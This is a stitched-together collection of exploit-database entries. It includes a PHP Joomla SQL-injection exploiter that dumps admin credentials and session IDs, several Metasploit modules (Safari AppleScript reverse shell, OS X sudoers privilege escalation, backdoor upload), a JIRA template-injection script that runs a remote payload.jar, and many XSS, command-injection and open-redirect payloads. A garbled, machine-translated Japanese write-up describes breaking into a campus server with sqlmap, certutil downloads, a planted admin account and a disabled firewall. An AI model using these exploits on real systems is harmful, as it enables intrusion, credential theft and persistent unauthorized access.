if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table> <br>
';
?>
<div align=center>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="check version">
<?php
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$finalurl=$target."/language/en-GB/en-GB.xml";
$data=file_get_contents($finalurl);
$ar0=explode("<version>", $data);
$ar1=explode("</version>", $ar0[1]);
$ar=trim($ar1[0]);
echo "<br>";
$v=explode(".",$ar);
if($v[0]<=3)
{
//echo "<br><br> Joomla version is 3.*.*";
//echo "<br> yes yes >:D<, fas gaya billu ";
echo "<br>click below button to exploit it :v <br><br>" ;
echo "<form method=post><input type=hidden name=tar value=".$target.">";
echo "<input type=submit name=sm1 value=\"Chal billu, ghuma de soday ne xD\">";
}
else{
echo "joomla version is below 3";
}
}
if(isset($_POST['sm1']))
{
$tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";
$dat=data($tar);
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);
$rt=str_replace("icalab",$ar,$tar);
$tr=data($rt);
$ar0=explode("Duplicate entry", $tr);
$ar1=explode("for key", $ar0[1]);
$rt2=str_replace("password","username,0x7e",$rt);
$tr2=data($rt2);
$ar2=explode("Duplicate entry", $tr2);
$ar3=explode("for key", $ar2[1]);
if($ar3[0]!='' && $ar1[0]!='')
{
echo "<br><br> Target gone 8-)<br><br>website name:- ".$_POST['tar']." <br>-------------------------------<br> <br>";
echo "username is --> ".str_replace("~1","",trim($ar3[0]))." <br>Password Hash is --> ".str_replace("~1","",trim($ar1[0]));
echo "<br>Admin session ID is<br></div>";
$sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";
$ses=data($sessionid);
$ar0=explode("Duplicate entry", $ses);
$ar1=explode("for key", $ar0[1]);
echo trim($ar1[0]);
}
}
?>
<!-- 3.2.* to 3.4.4 -->
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Safari User-Assisted Applescript Exec Attack',
'Description' => %q{
In versions of Mac OS X before 10.11.1, the applescript:// URL
scheme is provided, which opens the provided script in the Applescript
Editor. Pressing cmd-R in the Editor executes the code without any
additional confirmation from the user. By getting the user to press
cmd-R in Safari, and by hooking the cmd-key keypress event, a user
can be tricked into running arbitrary Applescript code.
Gatekeeper should be disabled from Security & Privacy in order to
avoid the unidentified Developer prompt.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_CMD,
'Platform' => ['unix', 'osx'],
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Targets' =>
[
[ 'Mac OS X', {} ]
],
'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2015',
'Author' => [ 'joev' ],
'References' =>
[
[ 'CVE', '2015-7007' ],
[ 'URL', 'https://support.apple.com/en-us/HT205375' ]
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::SAFARI,
:os_name => OperatingSystems::Match::MAC_OSX
}
))
register_options([
OptString.new('CONTENT', [false, "Content to display in browser",
"This page has failed to load. Press cmd-R to refresh."]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
], self.class)
end
def on_request_exploit(cli, request, profile)
print_status("Sending #{self.name}")
send_response_html(cli, exploit_html)
end
def exploit_html
"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
end
def exploit_js
js_obfuscate %Q|
var as = Array(150).join("\\n") +
'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
window.onkeydown = function(e) {
if (e.keyCode == 91) {
window.location = url;
}
};
|
end
def sh
'killall "Script Editor"; nohup ' + payload.encoded
end
def content
datastore['CONTENT']
end
end
source: https://www.securityfocus.com/bid/60172/info
Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected.
https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]
source: https://www.securityfocus.com/bid/60198/info
ADIF Log Search widget plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ADIF Log Search 1.0e is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
'Description' => %q{
This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
Makes sudo require no password, giving access to su even if root is disabled.
Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
},
'Author' => [
'rebel', # Vulnerability discovery and PoC
'shandelman116' # Copy/paste AND translator monkey
],
'References' => [
['EDB', '38371'],
['CVE', '2015-5889']
],
'DisclosureDate' => 'Oct 1 2015',
'License' => MSF_LICENSE,
# Want to ensure that this can be used on Python Meterpreter sessions as well
'Platform' => ['osx', 'python'],
'Arch' => [ARCH_X86_64, ARCH_PYTHON],
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.9.5-10.10.5', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp'
}
))
register_options(
[
OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
], self.class
)
end
def exploit
# Check OS
os_check
# Check if crontab file existed already so it can be restored at cleanup
if file_exist? "/etc/crontab"
@crontab_original = read_file("/etc/crontab")
else
@crontab_original = nil
end
# Writing payload
if payload.arch.include? ARCH_X86_64
vprint_status("Writing payload to #{payload_file}.")
write_file(payload_file, payload_source)
vprint_status("Finished writing payload file.")
register_file_for_cleanup(payload_file)
elsif payload.arch.include? ARCH_PYTHON
vprint_status("No need to write payload. Will simply execute after exploit")
vprint_status("Payload encodeded is #{payload.encoded}")
end
# Run exploit
sploit
# Execute payload
print_status('Executing payload...')
if payload.arch.include? ARCH_X86_64
cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
elsif payload.arch.include? ARCH_PYTHON
cmd_exec("python -c \"#{payload.encoded}\" & disown")
end
vprint_status("Finished executing payload.")
end
def os_check
# Get sysinfo
sysinfo = get_sysinfo
# Make sure its OS X (Darwin)
unless sysinfo["Kernel"].include? "Darwin"
print_warning("The target system does not appear to be running OS X!")
print_warning("Kernel information: #{sysinfo['Kernel']}")
return
end
# Make sure its not greater than 10.5 or less than 9.5
version = sysinfo["ProductVersion"]
minor_version = version[3...version.length].to_f
unless minor_version >= 9.5 && minor_version <= 10.5
print_warning("The target version of OS X does not appear to be compatible with the exploit!")
print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
end
end
def sploit
user = cmd_exec("whoami").chomp
vprint_status("The current effective user is #{user}. Starting the sploit")
# Get size of sudoers file
sudoer_path = "/etc/sudoers"
size = get_stat_size(sudoer_path)
# Set up the environment and command for spawning rsh and writing to crontab file
rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
rb_cmd = "ruby -e '#{rb_script}'"
# Attempt to execute
print_status("Attempting to write /etc/crontab...")
cmd_exec(rb_cmd)
vprint_status("Now to check whether the script worked...")
# Check whether it worked
crontab = cmd_exec("cat /etc/crontab")
vprint_status("Reading crontab yielded the following response: #{crontab}")
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
vprint_error("Bad news... it did not write to the file.")
fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
end
print_good("Succesfully wrote to crontab file!")
# Wait for sudoers to change
new_size = get_stat_size(sudoer_path)
print_status("Waiting for sudoers file to change...")
# Start timeout block
begin
Timeout.timeout(datastore['WaitTime']) {
while new_size <= size
Rex.sleep(1)
new_size = get_stat_size(sudoer_path)
end
}
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
end
print_good("Sudoers file has changed!")
# Confirming root access
print_status("Attempting to start root shell...")
cmd_exec("sudo -s su")
user = cmd_exec("whoami")
unless user.include? "root"
fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
end
print_good("Success! Acquired root access!")
end
def get_stat_size(file_path)
cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
response = cmd_exec(cmd)
vprint_status("Response to stat size query is #{response}")
begin
size = Integer(response)
return size
rescue ArgumentError
fail_with(Failure::UnexpectedReply, "Could not get stat size!")
end
end
def payload_source
if payload.arch.include? ARCH_X86_64
return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
elsif payload.arch.include? ARCH_PYTHON
return payload.encoded
end
end
def payload_file
@payload_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
def cleanup
vprint_status("Starting the cron restore process...")
super
# Restore crontab back to is original state
# If we don't do this, then cron will continue to append the no password rule to sudoers.
if @crontab_original.nil?
# Erase crontab file and kill cron process since it did not exist before
vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
if rm_ret.chomp.to_i == 0
vprint_good("Successfully removed crontab file!")
else
print_warning("Could not remove crontab file.")
end
Rex.sleep(1)
kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
if kill_ret.chomp.to_i == 0
vprint_good("Succesfully killed cron!")
else
print_warning("Could not kill cron process.")
end
else
# Write back the original content of crontab
vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
end
vprint_status("Finished the cleanup process.")
end
end
source: https://www.securityfocus.com/bid/60208/info
Code::Blocks is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
Code::Blocks 12.11 is vulnerable; other versions may also be affected.
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
'Description' => %q{
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
operating system version because of the php_uname() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jay Turla <@shipcod3>',
],
'References' =>
[
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000,
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['mma file uploader', {} ]
],
'DisclosureDate' => 'Apr 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
end
def has_input_name?(nodes, name)
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
end
def check
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res
n = ::Nokogiri::HTML(res.body)
form = n.at('form[@id="uploader"]')
inputs = form.search('input')
if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
data = Rex::MIME::Message.new
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.body =~ /uplod d0n3 in SAME file/
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
register_files_for_cleanup(payload_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Connection Timed Out')
end
send_request_cgi({
'uri' => normalize_uri(payload_name),
'method' => 'GET'
})
end
end
0x01はじめに
試験の準備をするとき、私は誤ってキャンパスネットワークのサイトをクリックしてレビューを停止しました(剣を描くだけです)
0x02浸透プロセス
注射のテスト
http://url/newdetail.aspx?id=11999 'または1=1-
SQLMAPは直接使用され、WAF(犬の頭)はありません
さりげなく見てください
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' - バッチ - dbs
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' - バッチ - ユーザー
DBMSSQLSERVER 2005
Whowing in Windows NT Authorityシステムは、組み込みシステム管理アカウントです
ディレクトリchdirを確認してください
dir C: \
OSバージョンMicrosoft(R)Windows(R)Server 2003、Enterprise Edition
IPConfig 
サーバー上のcertutilの存在は、コマンドのテストを決定することと同等です
VPS
python -m simplehttpserver 80
それを呼びます
ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/Amazing1x
エコーを発見してください
ただし、ウェブサイトのパスは中国語です。トロイの木馬を書くと、トロイの木馬を書くときは文字化けされます。解決策を見つけましたが、失敗しました。
環境変数を見てください
NMAPは、リモートで接続しようとするときにいくつかの問題があるため、ポートを見ました。最初は、理由が何であるかわからなかったので、見てみるつもりでした。
3389をリモートで接続して新しいユーザーを作成してみてください
#新しいユーザーを作成します
ネットユーザーAmazingAdmin123 Amazing.123456 /add
#grant権限
ネットローカルグループ管理者AmazingAdmin123 /add
#ユーザーをアクティブ化します
ネットユーザーAmazingAdmin123 /Active:YES
#close firewall
netshファイアウォールセットopmodeモード=無効
#enableデフォルト設定netshファイアウォールリセット
レジストリからポート3389を開きます
Echo Windows Registry Editorバージョン5.00 3389.REG
echo [hkey_local_machine \ system \ currentControlset \ control \ターミナルサーバー] 3389.REG
echo 'fdenytsconnections'=dword:0000000003389.REG
echo [hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ wds \ rdpwd \ tds \ tcp] 3389.Reg
echo 'ortnumber'=dword:00000d3d 3389.reg
echo [hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ Winstations \ RDP-TCP] 3389.REG
echo 'portnumber'=dword:00000d3d 3389.reg
Regedit /s 3389.REG関連レコード
関連レコード
このプロセスは2、3回連続して試されましたが、失敗し、その理由は見つかりませんでした。サービスはオフになりました。最初に試験を受け、管理者がコンピューターをオンにするのを待たなければなりませんでした。
Webサイトは、試験後の3日目にオンラインです。新しいユーザーを作成してみてください.
セキュリティポリシーの問題であることがわかりました。簡単なパスワードを使用することはできません。新しいユーザーを作成するときは、複雑なパスワードを使用するだけです。
リモート接続件
構成が読み込まれています.
0x03要約
1。ホームページhttp://url/newdetail.aspx?id=11999 'または1=1 -2で注入ポイントを見つけました。 sqlmapを介して注入するには、コマンドを実行してください:sql-shellselect @@ version; //データベースバージョンSQL-OSWHOAMIをクエリしますVPS Python -M SimpleHttpserver 804のHTTPサーバー。CSGenerationExeはVPSサーバーにアップロードできます。 5. NAMPを介してターゲットシステムを開くポートをスキャンして、3389が存在することを見つけます。6。ユーザーを作成して管理者の権限に追加し、耐火機能をオフにします#新しいユーザーSQL-OSNETユーザーAmazingAdmin123 admin@12 $ 12 /add sql-osnet sql-osnet rocalgroop管理者sqlmin123 /aditadmin123 /adit admin123 /addmin123を追加AmazingAdmin123 /Active:YES#ファイアウォールSQL-OSNETSHファイアウォールセットOPMODEモード=Disable7を閉じます。 MSTSC
オリジナルリンク:https://xz.aliyun.com/t/9444を介してリモートで正常に接続します
source: https://www.securityfocus.com/bid/60257/info
php4dvd is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
php4dvd 2.0 is vulnerable; other versions may also be affected.
POST /php4dvd/install/?go=configuration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/php4dvd/install/?go=configuration
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=9bucpus4ag68733h2fjpm190p0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
dbhost=localhost&dbport=3306;phpinfo()&dbname=php4dvd&dbuser=root&dbpass=myP@ssw0rd&url=php4dvd&template=default&defaultlanguage=en_US&submit=Next
source: https://www.securityfocus.com/bid/60262/info
Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>
source: https://www.securityfocus.com/bid/60290/info
Telaen is prone to an open-redirection vulnerability.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Versions prior to Telaen 1.3.1 are vulnerable.
http://www.example.com/telaen/redir.php?http://www.malicious-site.com
source: https://www.securityfocus.com/bid/60337/info
CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
CMS Gratis Indonesia 2.2 beta 1 is vulnerable; other versions may also be affected.
POST /cmsid/?setup=yes HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/cmsid/?setup=yes
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB
source: https://www.securityfocus.com/bid/60288/info
Telaen is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Telaen 1.3.1 are vulnerable.
http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>
================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
######################################################
# Exploit Title: Sagem javascript injection
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email : nios1515@gmail.com
######################################################
###########################
#By Soufiane Alami Hassani#
###########################
Vulnerability Description : You can change the password of your router even if you have not the access.
Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .
########################
Moroccan Are The Best .
########################
mimic_button('goto: 9096..')
############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version < 6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <chris@invivid.com>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################
import urllib2
import json
# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'
# jira server
RHOST = 'http://192.168.2.15:8080'
# samba public share, read/write to anonymous users
CMD = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())
source: https://www.securityfocus.com/bid/60354/info
QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary code with elevated privileges in the context of the user running the affected application.
The following are vulnerable:
QNAP VioStor NVR running firmware 4.0.3.
QNAP NAS
http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami
source: https://www.securityfocus.com/bid/60345/info
Apache Struts is prone to a remote OGNL expression injection vulnerability.
Remote attackers can exploit this issue to manipulate server-side objects and execute arbitrary commands within the context of the application.
Apache Struts 2.0.0 through versions 2.3.14.3 are vulnerable.
http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D
http://www.example.com/example/${#foo='Menu',#foo}
source: https://www.securityfocus.com/bid/60340/info
Telaen is prone to an information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.
Versions prior to Telaen 1.3.1 are vulnerable.
hhtp://www.example.com//telaen/inc/init.php